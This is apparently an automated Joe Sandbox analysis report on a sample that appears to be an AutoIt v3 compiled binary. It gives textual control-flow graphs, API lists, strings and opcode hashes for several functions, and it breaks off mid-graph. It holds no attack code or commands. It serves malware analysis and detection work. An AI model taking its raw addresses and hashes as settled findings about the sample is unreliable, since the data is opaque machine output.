                                                                                          control_flow_graph 482 7ff74d051d80-7ff74d051e17 call 7ff74d039640 GetVersionExW call 7ff74d037cf4 487 7ff74d099450 482->487 488 7ff74d051e1d 482->488 489 7ff74d099457-7ff74d09945d 487->489 490 7ff74d051e20-7ff74d051e46 call 7ff74d03dda4 488->490 492 7ff74d099463-7ff74d099480 489->492 495 7ff74d051e4c 490->495 496 7ff74d051fc1 490->496 492->492 494 7ff74d099482-7ff74d099485 492->494 494->490 497 7ff74d09948b-7ff74d099491 494->497 498 7ff74d051e53-7ff74d051e59 495->498 496->487 497->489 499 7ff74d099493 497->499 500 7ff74d051e5f-7ff74d051e7c 498->500 502 7ff74d099498-7ff74d0994a1 499->502 500->500 501 7ff74d051e7e-7ff74d051e81 500->501 501->502 503 7ff74d051e87-7ff74d051ed6 call 7ff74d03dda4 501->503 502->498 504 7ff74d0994a7 502->504 507 7ff74d051edc-7ff74d051ede 503->507 508 7ff74d099645-7ff74d09964d 503->508 504->496 511 7ff74d051ee4-7ff74d051efa 507->511 512 7ff74d0994ac-7ff74d0994af 507->512 509 7ff74d09964f-7ff74d099658 508->509 510 7ff74d09965a-7ff74d09965d 508->510 515 7ff74d099686-7ff74d099692 509->515 510->515 516 7ff74d09965f-7ff74d099674 510->516 517 7ff74d099572-7ff74d099579 511->517 518 7ff74d051f00-7ff74d051f02 511->518 513 7ff74d051f3c-7ff74d051f80 GetCurrentProcess IsWow64Process call 7ff74d056240 512->513 514 7ff74d0994b5-7ff74d099501 512->514 530 7ff74d09969d-7ff74d0996b3 call 7ff74d0a32f4 513->530 535 7ff74d051f86-7ff74d051f8b GetSystemInfo 513->535 514->513 520 7ff74d099507-7ff74d09950e 514->520 515->530 521 7ff74d09967f 516->521 522 7ff74d099676-7ff74d09967d 516->522 523 7ff74d099589-7ff74d099599 517->523 524 7ff74d09957b-7ff74d099584 517->524 525 7ff74d051f08-7ff74d051f0b 518->525 526 7ff74d09959e-7ff74d0995b3 518->526 528 7ff74d099510-7ff74d099518 520->528 529 7ff74d099534-7ff74d09953c 520->529 521->515 522->515 523->513 524->513 531 7ff74d051f11-7ff74d051f2d 525->531 532 7ff74d0995ed-7ff74d0995f0 525->532 533 7ff74d0995c3-7ff74d0995d3 526->533 534 7ff74d0995b5-7ff74d0995be 526->534 537 7ff74d099526-7ff74d09952f 528->537 538 7ff74d09951a-7ff74d099521 528->538 539 7ff74d09954c-7ff74d099554 529->539 540 7ff74d09953e-7ff74d099547 529->540 550 7ff74d0996b5-7ff74d0996d5 call 7ff74d0a32f4 530->550 551 7ff74d0996d7-7ff74d0996dc GetSystemInfo 530->551 542 7ff74d0995d8-7ff74d0995e8 531->542 543 7ff74d051f33 531->543 532->513 536 7ff74d0995f6-7ff74d099620 532->536 533->513 534->513 544 7ff74d051f91-7ff74d051fc0 535->544 545 7ff74d099630-7ff74d099640 536->545 546 7ff74d099622-7ff74d09962b 536->546 537->513 538->513 547 7ff74d099564-7ff74d09956d 539->547 548 7ff74d099556-7ff74d09955f 539->548 540->513 542->513 543->513 545->513 546->513 547->513 548->513 553 7ff74d0996e2-7ff74d0996ea 550->553 551->553 553->544 555 7ff74d0996f0-7ff74d0996f7 FreeLibrary 553->555 555->544
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentInfoSystemVersionWow64
                                                                                          • String ID: |O
                                                                                          • API String ID: 1568231622-607156228
                                                                                          • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                                          • Instruction ID: aa6ee9c63333291d34e5610088bbe7f7dffe6cd6c7cc7ca9bbf84ce6e6ee4711
                                                                                          • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                                          • Instruction Fuzzy Hash: 4DD14A25B1D2C3C9E621BB11F810175BB91AF16788FD28279D9CD13666FE7EA500CB21
                                                                                          Function 00007FF74D0CF630 Relevance: 12.4, APIs: 8, Instructions: 350processCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 719 7ff74d0cf630-7ff74d0cf69e call 7ff74d056240 722 7ff74d0cf6d4-7ff74d0cf6d9 719->722 723 7ff74d0cf6a0-7ff74d0cf6b8 call 7ff74d03ffbc 719->723 724 7ff74d0cf6db-7ff74d0cf6ef call 7ff74d03ffbc 722->724 725 7ff74d0cf71e-7ff74d0cf723 722->725 734 7ff74d0cf708-7ff74d0cf70d 723->734 735 7ff74d0cf6ba-7ff74d0cf6d2 call 7ff74d03ffbc 723->735 737 7ff74d0cf6f3-7ff74d0cf706 call 7ff74d03ffbc 724->737 728 7ff74d0cf725-7ff74d0cf729 725->728 729 7ff74d0cf736-7ff74d0cf75c call 7ff74d03d4cc call 7ff74d03e330 725->729 733 7ff74d0cf72d-7ff74d0cf732 call 7ff74d03ffbc 728->733 748 7ff74d0cf840-7ff74d0cf84a 729->748 749 7ff74d0cf762-7ff74d0cf7cf call 7ff74d03d4cc call 7ff74d03e330 call 7ff74d03d4cc call 7ff74d03e330 call 7ff74d03d4cc call 7ff74d03e330 729->749 733->729 738 7ff74d0cf70f-7ff74d0cf717 734->738 739 7ff74d0cf719-7ff74d0cf71c 734->739 735->737 737->725 737->734 738->733 739->725 739->729 751 7ff74d0cf84c-7ff74d0cf86e call 7ff74d03d4cc call 7ff74d03e330 748->751 752 7ff74d0cf87d-7ff74d0cf8af GetCurrentDirectoryW call 7ff74d054c68 GetCurrentDirectoryW 748->752 796 7ff74d0cf806-7ff74d0cf83e GetSystemDirectoryW call 7ff74d054c68 GetSystemDirectoryW 749->796 797 7ff74d0cf7d1-7ff74d0cf7f3 call 7ff74d03d4cc call 7ff74d03e330 749->797 751->752 767 7ff74d0cf870-7ff74d0cf87b call 7ff74d058d58 751->767 761 7ff74d0cf8b5-7ff74d0cf8b8 752->761 764 7ff74d0cf8f0-7ff74d0cf8ff call 7ff74d0af464 761->764 765 7ff74d0cf8ba-7ff74d0cf8eb call 7ff74d04f688 * 3 761->765 774 7ff74d0cf905-7ff74d0cf95d call 7ff74d0afddc call 7ff74d0afca8 call 7ff74d0afafc 764->774 775 7ff74d0cf901-7ff74d0cf903 764->775 765->764 767->752 767->764 779 7ff74d0cf964-7ff74d0cf96c 774->779 809 7ff74d0cf95f 774->809 775->779 784 7ff74d0cfa0f-7ff74d0cfa4b CreateProcessW 779->784 785 7ff74d0cf972-7ff74d0cfa0d call 7ff74d09d1f8 call 7ff74d058d58 * 3 call 7ff74d054c24 * 3 779->785 789 7ff74d0cfa4f-7ff74d0cfa62 call 7ff74d054c24 * 2 784->789 785->789 811 7ff74d0cfa64-7ff74d0cfabc call 7ff74d034afc * 2 GetLastError call 7ff74d04f214 call 7ff74d0413e0 789->811 812 7ff74d0cfabe-7ff74d0cfaca CloseHandle 789->812 796->761 797->796 824 7ff74d0cf7f5-7ff74d0cf800 call 7ff74d058d58 797->824 809->779 826 7ff74d0cfb3b-7ff74d0cfb65 call 7ff74d0af51c 811->826 818 7ff74d0cfaf5-7ff74d0cfafc 812->818 819 7ff74d0cfacc-7ff74d0cfaf0 call 7ff74d0af7dc call 7ff74d0b0088 call 7ff74d0cfb68 812->819 820 7ff74d0cfb0c-7ff74d0cfb35 call 7ff74d0413e0 CloseHandle 818->820 821 7ff74d0cfafe-7ff74d0cfb0a 818->821 819->818 820->826 821->826 824->761 824->796
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                                                          • String ID:
                                                                                          • API String ID: 1787492119-0
                                                                                          • Opcode ID: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
                                                                                          • Instruction ID: 6e5a0e89297c475481722d7c12543a2a0f2779b659434ef0f104e4d3e444339c
                                                                                          • Opcode Fuzzy Hash: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
                                                                                          • Instruction Fuzzy Hash: E3E18022B0DB41C6EB14FB26D5542BDA7A1FB84B84F804536EE9E477A9EF38E405C710
                                                                                          Function 00007FF74D0AC7C0 Relevance: 6.0, APIs: 4, Instructions: 24filestringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 2695905019-0
                                                                                          • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                                          • Instruction ID: 850ccf7ad2c3d0bcd6a2c0840760b6555f65de101002a5b1579e6b72aecdbf03
                                                                                          • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                                          • Instruction Fuzzy Hash: C3F05E50E0C606C1EA24BB34B80C338A260FF95B75F984B30D5BE0B2F4EF6CD4994220
                                                                                          Function 00007FF74D037920 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 178registryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                                          • API String ID: 2667193904-1575078665
                                                                                          • Opcode ID: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
                                                                                          • Instruction ID: 20dac265365587ea99de16a398501b98a11114563096d7b23365d633e9f3ceb3
                                                                                          • Opcode Fuzzy Hash: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
                                                                                          • Instruction Fuzzy Hash: B6912922A1CA83D5EB20FB24E8401BDA364FF84744BC10636E98D47AA5FF7DE645C760
                                                                                          Function 00007FF74D035DEC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 143windowtimeregistryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 131 7ff74d035dec-7ff74d035e21 133 7ff74d035e91-7ff74d035e94 131->133 134 7ff74d035e23-7ff74d035e26 131->134 133->134 137 7ff74d035e96 133->137 135 7ff74d035e98 134->135 136 7ff74d035e28-7ff74d035e2f 134->136 139 7ff74d07c229-7ff74d07c261 call 7ff74d04ede4 call 7ff74d052c44 135->139 140 7ff74d035e9e-7ff74d035ea3 135->140 141 7ff74d035f21-7ff74d035f29 PostQuitMessage 136->141 142 7ff74d035e35-7ff74d035e3a 136->142 138 7ff74d035e6b-7ff74d035e76 DefWindowProcW 137->138 148 7ff74d035e7c-7ff74d035e90 138->148 178 7ff74d07c267-7ff74d07c26e 139->178 143 7ff74d035ecc-7ff74d035efa SetTimer RegisterWindowMessageW 140->143 144 7ff74d035ea5-7ff74d035ea8 140->144 149 7ff74d035ec8-7ff74d035eca 141->149 145 7ff74d035e40-7ff74d035e43 142->145 146 7ff74d07c2af-7ff74d07c2c5 call 7ff74d0aa40c 142->146 143->149 152 7ff74d035efc-7ff74d035f09 CreatePopupMenu 143->152 150 7ff74d035eae-7ff74d035ebe KillTimer call 7ff74d035d88 144->150 151 7ff74d07c1b8-7ff74d07c1bb 144->151 153 7ff74d035e49-7ff74d035e4e 145->153 154 7ff74d035f2b-7ff74d035f35 call 7ff74d054610 145->154 146->149 172 7ff74d07c2cb 146->172 149->148 168 7ff74d035ec3 call 7ff74d037098 150->168 157 7ff74d07c1bd-7ff74d07c1c0 151->157 158 7ff74d07c1f7-7ff74d07c224 MoveWindow 151->158 152->149 160 7ff74d07c292-7ff74d07c299 153->160 161 7ff74d035e54-7ff74d035e59 153->161 165 7ff74d035f3a 154->165 166 7ff74d07c1e4-7ff74d07c1f2 SetFocus 157->166 167 7ff74d07c1c2-7ff74d07c1c5 157->167 158->149 160->138 169 7ff74d07c29f-7ff74d07c2aa call 7ff74d09c54c 160->169 170 7ff74d035f0b-7ff74d035f1f call 7ff74d035f3c 161->170 171 7ff74d035e5f-7ff74d035e65 161->171 165->149 166->149 167->171 174 7ff74d07c1cb-7ff74d07c1df call 7ff74d04ede4 167->174 168->149 169->138 170->149 171->138 171->178 172->138 174->149 178->138 179 7ff74d07c274-7ff74d07c28d call 7ff74d035d88 call 7ff74d036258 178->179 179->138
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                          • String ID: TaskbarCreated
                                                                                          • API String ID: 129472671-2362178303
                                                                                          • Opcode ID: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                                          • Instruction ID: a78e14727ba7d0c28cebb54baaf2a3af36935a7a6d89a33f505ac1bf597970d7
                                                                                          • Opcode Fuzzy Hash: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                                          • Instruction Fuzzy Hash: 52514531E0C647C6FA28FB24AA4C278E250AF55B80FC50535D8CD536B1FEBDE5458720
                                                                                          Function 00007FF74D033D90 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57windowregistryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                          • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                                          • API String ID: 2914291525-2659433951
                                                                                          • Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                                          • Instruction ID: 258a306c74f86ae56d228fe69ebad4c0f6772c8a02d2eaa8303e029d7f36c752
                                                                                          • Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                                          • Instruction Fuzzy Hash: 28311632A0CB46CAE700EB60F8483A877B4BB48758F900639DA9D57B64EF7D9159CB50
                                                                                          Function 00007FF74D04E958 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 304comCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 189 7ff74d04e958-7ff74d04e9ae 190 7ff74d0927e4-7ff74d0927ea DestroyWindow 189->190 191 7ff74d04e9b4-7ff74d04e9d3 mciSendStringW 189->191 194 7ff74d0927f0-7ff74d092801 190->194 192 7ff74d04ecbd-7ff74d04ecce 191->192 193 7ff74d04e9d9-7ff74d04e9e3 191->193 196 7ff74d04ecf7-7ff74d04ed01 192->196 197 7ff74d04ecd0-7ff74d04ecf0 UnregisterHotKey 192->197 193->194 195 7ff74d04e9e9 193->195 199 7ff74d092803-7ff74d092806 194->199 200 7ff74d092835-7ff74d09283f 194->200 198 7ff74d04e9f0-7ff74d04e9f3 195->198 196->193 202 7ff74d04ed07 196->202 197->196 201 7ff74d04ecf2 call 7ff74d04f270 197->201 204 7ff74d04e9f9-7ff74d04ea08 call 7ff74d033aa8 198->204 205 7ff74d04ecb0-7ff74d04ecb8 call 7ff74d035410 198->205 206 7ff74d092813-7ff74d092817 FindClose 199->206 207 7ff74d092808-7ff74d092811 call 7ff74d038314 199->207 200->194 203 7ff74d092841 200->203 201->196 202->192 214 7ff74d092846-7ff74d09284f call 7ff74d0c8c00 203->214 220 7ff74d04ea0f-7ff74d04ea12 204->220 205->198 209 7ff74d09281d-7ff74d09282e 206->209 207->209 209->200 213 7ff74d092830 call 7ff74d0b3180 209->213 213->200 214->220 220->214 222 7ff74d04ea18 220->222 223 7ff74d04ea1f-7ff74d04ea22 222->223 224 7ff74d092854-7ff74d09285d call 7ff74d0a46cc 223->224 225 7ff74d04ea28-7ff74d04ea32 223->225 224->223 226 7ff74d092862-7ff74d092873 225->226 227 7ff74d04ea38-7ff74d04ea42 225->227 232 7ff74d092875 FreeLibrary 226->232 233 7ff74d09287b-7ff74d092885 226->233 229 7ff74d04ea48-7ff74d04ea76 call 7ff74d0413e0 227->229 230 7ff74d09288c-7ff74d09289d 227->230 242 7ff74d04ea78 229->242 243 7ff74d04eabf-7ff74d04eacc OleUninitialize 229->243 234 7ff74d09289f-7ff74d0928c2 VirtualFree 230->234 235 7ff74d0928c9-7ff74d0928d3 230->235 232->233 233->226 237 7ff74d092887 233->237 234->235 238 7ff74d0928c4 call 7ff74d0b321c 234->238 235->230 240 7ff74d0928d5 235->240 237->230 238->235 245 7ff74d0928da-7ff74d0928de 240->245 244 7ff74d04ea7d-7ff74d04eabd call 7ff74d04f1c4 call 7ff74d04f13c 242->244 243->245 246 7ff74d04ead2-7ff74d04ead9 243->246 244->243 245->246 248 7ff74d0928e4-7ff74d0928ef 245->248 249 7ff74d0928f4-7ff74d092903 call 7ff74d0b31d4 246->249 250 7ff74d04eadf-7ff74d04eaea 246->250 248->246 263 7ff74d092905 249->263 253 7ff74d04ed09-7ff74d04ed18 call 7ff74d0542a0 250->253 254 7ff74d04eaf0-7ff74d04eb22 call 7ff74d03a07c call 7ff74d04f08c call 7ff74d0339bc 250->254 253->254 265 7ff74d04ed1e 253->265 273 7ff74d04eb2e-7ff74d04ebc4 call 7ff74d0339bc call 7ff74d03a07c call 7ff74d0345c8 * 2 call 7ff74d03a07c * 3 call 7ff74d0413e0 call 7ff74d04ee68 call 7ff74d04ee2c * 3 254->273 274 7ff74d04eb24-7ff74d04eb29 call 7ff74d054c24 254->274 266 7ff74d09290a-7ff74d092919 call 7ff74d0a3a78 263->266 265->253 272 7ff74d09291b 266->272 277 7ff74d092920-7ff74d09292f call 7ff74d04e4e4 272->277 273->266 316 7ff74d04ebca-7ff74d04ebdc call 7ff74d0339bc 273->316 274->273 283 7ff74d092931 277->283 286 7ff74d092936-7ff74d092945 call 7ff74d0b3078 283->286 293 7ff74d092947 286->293 295 7ff74d09294c-7ff74d09295b call 7ff74d0b31a8 293->295 301 7ff74d09295d 295->301 304 7ff74d092962-7ff74d092971 call 7ff74d0b31a8 301->304 310 7ff74d092973 304->310 310->310 316->277 319 7ff74d04ebe2-7ff74d04ebec 316->319 319->286 320 7ff74d04ebf2-7ff74d04ec08 call 7ff74d03a07c 319->320 323 7ff74d04ec0e-7ff74d04ec18 320->323 324 7ff74d04ed20-7ff74d04ed25 call 7ff74d054c24 320->324 326 7ff74d04ec8a-7ff74d04eca9 call 7ff74d03a07c call 7ff74d054c24 323->326 327 7ff74d04ec1a-7ff74d04ec24 323->327 324->190 337 7ff74d04ecab 326->337 327->295 330 7ff74d04ec2a-7ff74d04ec3b 327->330 330->304 332 7ff74d04ec41-7ff74d04ed71 call 7ff74d03a07c * 3 call 7ff74d04ee10 call 7ff74d04ed8c 330->332 347 7ff74d04ed77-7ff74d04ed88 332->347 348 7ff74d092978-7ff74d092987 call 7ff74d0bd794 332->348 337->327 351 7ff74d092989 348->351 351->351
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                                          • String ID: close all
                                                                                          • API String ID: 1992507300-3243417748
                                                                                          • Opcode ID: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
                                                                                          • Instruction ID: e816f5ba0f7c0e42d2ab7f5b5df4feacbb9732992063b42fdb6826c544ae5199
                                                                                          • Opcode Fuzzy Hash: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
                                                                                          • Instruction Fuzzy Hash: B9E13D21B4EA02C1EE58FB16C6546BCA361FF85B44FD44475DB8E532A1EF7CE8628720
                                                                                          Function 00007FF74D033B84 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60windowregistryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                          • String ID: AutoIt v3
                                                                                          • API String ID: 423443420-1704141276
                                                                                          • Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                                          • Instruction ID: 1e837a84cdabf5ea3b05550f0c3f4142eb2e8ce267a16adb9c17c320d3917dd5
                                                                                          • Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                                          • Instruction Fuzzy Hash: DE31E236A0CB42CAE750EB51F8483A8B364BB88754F854639CD8D27B24EF7DE1548B60
                                                                                          Function 00007FF74D077348 Relevance: 13.8, APIs: 9, Instructions: 272fileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 419 7ff74d077348-7ff74d0773ba call 7ff74d077078 422 7ff74d0773bc-7ff74d0773c4 call 7ff74d0655b4 419->422 423 7ff74d0773d3-7ff74d0773dd call 7ff74d06e418 419->423 428 7ff74d0773c7-7ff74d0773ce call 7ff74d0655d4 422->428 429 7ff74d0773f7-7ff74d077463 CreateFileW 423->429 430 7ff74d0773df-7ff74d0773f5 call 7ff74d0655b4 call 7ff74d0655d4 423->430 446 7ff74d07771a-7ff74d077736 428->446 431 7ff74d0774eb-7ff74d0774f6 GetFileType 429->431 432 7ff74d077469-7ff74d077470 429->432 430->428 438 7ff74d077549-7ff74d07754f 431->438 439 7ff74d0774f8-7ff74d077533 GetLastError call 7ff74d065564 CloseHandle 431->439 435 7ff74d0774b8-7ff74d0774e6 GetLastError call 7ff74d065564 432->435 436 7ff74d077472-7ff74d077476 432->436 435->428 436->435 444 7ff74d077478-7ff74d0774b6 CreateFileW 436->444 442 7ff74d077556-7ff74d077559 438->442 443 7ff74d077551-7ff74d077554 438->443 439->428 454 7ff74d077539-7ff74d077544 call 7ff74d0655d4 439->454 449 7ff74d07755e-7ff74d0775ac call 7ff74d06e334 442->449 450 7ff74d07755b 442->450 443->449 444->431 444->435 457 7ff74d0775ae-7ff74d0775ba call 7ff74d077284 449->457 458 7ff74d0775c0-7ff74d0775ea call 7ff74d076de4 449->458 450->449 454->428 464 